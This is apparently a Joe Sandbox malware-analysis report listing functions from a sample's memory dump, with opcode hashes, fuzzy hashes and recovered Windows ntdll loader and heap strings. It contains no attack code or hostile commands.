                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG96$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1906353270
                                                                          • Opcode ID: b373d110443cd8825dc24427268bdf2954c37af74a8bf86512dc7d2c39070acc
                                                                          • Instruction ID: f14f6cf7dc53fdebd761ff7fd62e73742a41097a984b56c62209873eaa4d1073
                                                                          • Opcode Fuzzy Hash: b373d110443cd8825dc24427268bdf2954c37af74a8bf86512dc7d2c39070acc
                                                                          • Instruction Fuzzy Hash: 84312776E00311EFEB11DF5AC880A5A7BB6FF85744F35045AED40B7240DAB19992CB90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: e115d83775580fa410295e017bc06359a7b7f7acd377d67454dd8168818024d3
                                                                          • Instruction ID: 829baa93e742cc5ba3edfe8fe10c787645bd928179466dba7d1ce99e807a5f69
                                                                          • Opcode Fuzzy Hash: e115d83775580fa410295e017bc06359a7b7f7acd377d67454dd8168818024d3
                                                                          • Instruction Fuzzy Hash: D42153B6E00169ABDB11DF69DC40AEFBBF8EF54744F44012AE955E3200EB31D901CBA5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3610490719
                                                                          • Opcode ID: ccfde38502b638967d7dfdb602862106bd794ffe6b7d1ce21984de1f9bed0da0
                                                                          • Instruction ID: 679c35e4c3fed89402da9b10436c4256528dbad92aed094058ade3097fd5059e
                                                                          • Opcode Fuzzy Hash: ccfde38502b638967d7dfdb602862106bd794ffe6b7d1ce21984de1f9bed0da0
                                                                          • Instruction Fuzzy Hash: 23911E79B14751DBFB0ADF65C880B2AB7A9BF80B44F00142DE9419BA81DB34E845CF92
                                                                          APIs
                                                                          Strings
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 3642A10F
                                                                          • LdrpCheckModule, xrefs: 3642A117
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3642A121
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-161242083
                                                                          • Opcode ID: 7e032cd9b3ac94675a13e53bf192670d5e3e46163323619d1fca78fffc29109a
                                                                          • Instruction ID: 047ddb75121c51d5d7f977410b64c3ddaaa0c305777c2729f38889cf66043c2f
                                                                          • Opcode Fuzzy Hash: 7e032cd9b3ac94675a13e53bf192670d5e3e46163323619d1fca78fffc29109a
                                                                          • Instruction Fuzzy Hash: B971DE76E00215DFEB05DFA8C980AAEB7F5EF44704F24446DD941AB200E774AD96CBA1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $File
                                                                          • API String ID: 3446177414-2412145507
                                                                          • Opcode ID: 2ad283ec87a95a1ba9db717d27bb0ae3268c385c8f063665802c83aaf98d1df3
                                                                          • Instruction ID: 3ac184f583ae649c3f66ddd5c2228eb5706cc3b80c55181e977f6365f4cace48
                                                                          • Opcode Fuzzy Hash: 2ad283ec87a95a1ba9db717d27bb0ae3268c385c8f063665802c83aaf98d1df3
                                                                          • Instruction Fuzzy Hash: B6617D71E5022C9FDB268F69CC45BEABBF9AB08700F4445A9E509E71C1DA709F84CF54
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 364382E8
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 364382DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 364382D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1783798831
                                                                          • Opcode ID: 396b548cd050d3c75e2a5532469baeb5c64ccb2fe0cdc603bd788a63285dab69
                                                                          • Instruction ID: 51ab0c770f642767c7af14e34ddb0bf14b7a703458d64832ac094103c93255ac
                                                                          • Opcode Fuzzy Hash: 396b548cd050d3c75e2a5532469baeb5c64ccb2fe0cdc603bd788a63285dab69
                                                                          • Instruction Fuzzy Hash: B04102B6D55310AFDB11DF64CC80B4BB7E9EF4A750F10492AFA84A7290EB31D815CB92
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 36437BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36437B7F
                                                                          • RTL: Resource at %p, xrefs: 36437B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 966e3a12b2ef4a09296ae167b020ec62e06494061cbaa7f310ad60dda49a148b
                                                                          • Instruction ID: 1ac5fd3552f763da04f51cd2edf835f7d7f62c5b606dfb5c8442d14f445d6e3e
                                                                          • Opcode Fuzzy Hash: 966e3a12b2ef4a09296ae167b020ec62e06494061cbaa7f310ad60dda49a148b
                                                                          • Instruction Fuzzy Hash: 9B410379B117028FE711CE25DD40B5AB7F5EF88314F100A2DE9969B680DB32E405CF91
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3643728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 364372C1
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36437294
                                                                          • RTL: Resource at %p, xrefs: 364372A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 6864d3bd2776cee429bf90905446ad0eb435ce9ccb227217bb2a171450919fca
                                                                          • Instruction ID: ba14b2b41ef6de2f7f0144e6edbd3752970967ff07a4bd4243bc720d2c0da0ce
                                                                          • Opcode Fuzzy Hash: 6864d3bd2776cee429bf90905446ad0eb435ce9ccb227217bb2a171450919fca
                                                                          • Instruction Fuzzy Hash: 45412F75E01312ABE711CE21CE41FA6B7A5FB88350F200619F895AB280DB32E816CFD5
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36444899
                                                                          • LdrpCheckRedirection, xrefs: 3644488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36444888
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 3446177414-3154609507
                                                                          • Opcode ID: d8261027a5990d394c0eff5f2babc1090c0acd3bffc0747e4e2ab07b723cae6b
                                                                          • Instruction ID: 35a7670bb5614527c2a5237dda6f35b4286d580987b67e17400df209ff5ecabc
                                                                          • Opcode Fuzzy Hash: d8261027a5990d394c0eff5f2babc1090c0acd3bffc0747e4e2ab07b723cae6b
                                                                          • Instruction Fuzzy Hash: 9D41DE7AE047608BFB13EE29E842A567BE5EF49790F110559ED88A7351E730D802CBE1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 81ceea2f3204762ccdf9f2de5129b9661ca75ea1aaf3eda1954b37893d0345fd
                                                                          • Instruction ID: ec77dc9f211a7ae43c4d61d97feb1a56a0d3bd97f9835f9a39cb02622271161e
                                                                          • Opcode Fuzzy Hash: 81ceea2f3204762ccdf9f2de5129b9661ca75ea1aaf3eda1954b37893d0345fd
                                                                          • Instruction Fuzzy Hash: DF314176E002299FDB51CF39DC40BEFB7B8EF44650F90455AE859E3640EB30AA458FA1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Wow64 Emulation Layer
                                                                          • API String ID: 3446177414-921169906
                                                                          • Opcode ID: 4c5e9aaec3143699d45a7a31b67fe7822da46d600cea0218d823110a7ceb7392
                                                                          • Instruction ID: 2ac94484a0542552e4ea1285f91d47e3f1cf814fe8d11f676b08ae34babf9c39
                                                                          • Opcode Fuzzy Hash: 4c5e9aaec3143699d45a7a31b67fe7822da46d600cea0218d823110a7ceb7392
                                                                          • Instruction Fuzzy Hash: 7D21C77690015DBFAF029EA1CD84DEF7F7EEF46298B4404A4FA15A2140DB34DE05EB61
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 1f524f6504744883394411dcf788f4ff9533fe3a275f0e0fd26253216489a133
                                                                          • Instruction ID: f74b9415a10395f35cd0a6b91624b43cfb6b19e0a012ec67d67cafb6308bc5a6
                                                                          • Opcode Fuzzy Hash: 1f524f6504744883394411dcf788f4ff9533fe3a275f0e0fd26253216489a133
                                                                          • Instruction Fuzzy Hash: D7E15C71E40309AFEF05CFA5C885BEEBBF9BF49354F20852AE515AB280D7709A45CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3d43d37b355411d8dd8b650e0ff15f0fc9dc90a55824f20709df2992594deb9
                                                                          • Instruction ID: b0c7915d0d95108892e3d56c7bc67507a0d835fd1f38e6812f7962ebb2f42d29
                                                                          • Opcode Fuzzy Hash: d3d43d37b355411d8dd8b650e0ff15f0fc9dc90a55824f20709df2992594deb9
                                                                          • Instruction Fuzzy Hash: 0AE1E2B6D00728DFEB21CFA9C980A8DBBF5BF48354F20452EE545A7260DB70A945CF60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: c124ef251a8caf86c7268d970f80ca118fcee0bca8621dc3fc60ee9ed4e089d8
                                                                          • Instruction ID: f4129aaec4c2f55948ae0fd0da394f0f538981e8ae3b7965090873cf5b6ebbfa
                                                                          • Opcode Fuzzy Hash: c124ef251a8caf86c7268d970f80ca118fcee0bca8621dc3fc60ee9ed4e089d8
                                                                          • Instruction Fuzzy Hash: 137136B1E023199FEF45CFA5D980A9DBBB5BF48354F24402AE905FB250D734A915CF90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: c01b10404f534bdd7d276d1e2be9975f6e28f78f4743c83cafb6f8bed308ecdc
                                                                          • Instruction ID: 831a80439a273bb537eecd1ea98e9f3ca192d8dc17eb86a5abf8ab6b996d0043
                                                                          • Opcode Fuzzy Hash: c01b10404f534bdd7d276d1e2be9975f6e28f78f4743c83cafb6f8bed308ecdc
                                                                          • Instruction Fuzzy Hash: 93517E74F50A229FEB09CE19C494A997BF5FF89364B24406DD906DB710DBB0EC82CB80
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8e126bac2e1cc59653c0bbbd67a293f13b4f1e5c5f4244803319cdff94de2227
                                                                          • Instruction ID: a47e40ff0bc3dc1befbd470a6242269e90bd409f9c7c1af3328f29a1a931b960
                                                                          • Opcode Fuzzy Hash: 8e126bac2e1cc59653c0bbbd67a293f13b4f1e5c5f4244803319cdff94de2227
                                                                          • Instruction Fuzzy Hash: 66513FB6E02319DFEB49CF95C944ACCBBB6BF48354F24802AE815BB250D734A912CF50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          • Opcode ID: 974365e5f9c409d979f8eb47c6fef85c15773356bf49e40fd51d045c8bc27f59
                                                                          • Instruction ID: e6d92b6c350652a672fed9dddaec2723e77db43de25d693c2e76a7dd5be29ea1
                                                                          • Opcode Fuzzy Hash: 974365e5f9c409d979f8eb47c6fef85c15773356bf49e40fd51d045c8bc27f59
                                                                          • Instruction Fuzzy Hash: 1631E075E01628AFDF15DFA8E884A9EBBB1EB49320F20412AE511B7390DB359911CF64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: e9d358d191925e351e4b6fadd21c36c50abd2292d3cf044d12694891961f9aa8
                                                                          • Instruction ID: 226671e78c9e68097692da5dac12e565063fa114716a50ce57d5d6c415c373b1
                                                                          • Opcode Fuzzy Hash: e9d358d191925e351e4b6fadd21c36c50abd2292d3cf044d12694891961f9aa8
                                                                          • Instruction Fuzzy Hash: 51324374D44269DFEB21CF64C884BD9BBB4BF09314F1080E9E549A7241DBB4AE98CF91
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 56e3e3c8934c99c77aea83777366208b133a3da347eb8cce28c9acd8fc9a087a
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 0891C674E002359FEB11DF65CA846AEF7AAAF443A5F60853AE854E73C0DB309941CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$Flst
                                                                          • API String ID: 0-758220159
                                                                          • Opcode ID: e9e2def35a9a90df89eaa8aa8c994d07f0b51c67a0141d7a26dc4db1954959f6
                                                                          • Instruction ID: 644aa352d1040e7a0085b1cc8e961aacd84dd646c833bcfc035f62d6876ea3ae
                                                                          • Opcode Fuzzy Hash: e9e2def35a9a90df89eaa8aa8c994d07f0b51c67a0141d7a26dc4db1954959f6
                                                                          • Instruction Fuzzy Hash: C751BEB5E252548FEB12CF99C884659FBF4EF44398F24802EE0499F253EB719949CB90
                                                                          APIs
                                                                          Strings
                                                                          • kLsE, xrefs: 363C0540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 363C063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 3446177414-2547482624
                                                                          • Opcode ID: c53408a987b186aff7d6a19b48d7499571012de254ffb215995c331b921df014
                                                                          • Instruction ID: 21164d1f0666e9e9c3d1294b54a7019db338bcd14cbed6ac38cb4611523947e8
                                                                          • Opcode Fuzzy Hash: c53408a987b186aff7d6a19b48d7499571012de254ffb215995c331b921df014
                                                                          • Instruction Fuzzy Hash: 1B51ABB9954B828BD714DF75C9806D7B7E4EF84304F10483EE9AA87240E732D989CF92
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 3644CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4Qw@4Qw
                                                                          • API String ID: 4062629308-2383119779
                                                                          • Opcode ID: bc68a7ab3d30f51207a61e097f1693671d285061d93e075fed7607822d28d607
                                                                          • Instruction ID: 4c51d3f12c90e3ce9a385e87bdd8304be43d0c81be43527270958b7adb63cfc5
                                                                          • Opcode Fuzzy Hash: bc68a7ab3d30f51207a61e097f1693671d285061d93e075fed7607822d28d607
                                                                          • Instruction Fuzzy Hash: 26418FB6D00224DFEB12DFA5C881AADBBF9FF46714F11412AE944DB250DB74C901CB66
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: 7cb5231c6b956395caa69ff2da3653fde5c929ba1f5bdfe634aaf20225ad483d
                                                                          • Instruction ID: c4f6a3291a529ead4c59650443c430682277cbb097a90d5d939f36bae148f766
                                                                          • Opcode Fuzzy Hash: 7cb5231c6b956395caa69ff2da3653fde5c929ba1f5bdfe634aaf20225ad483d
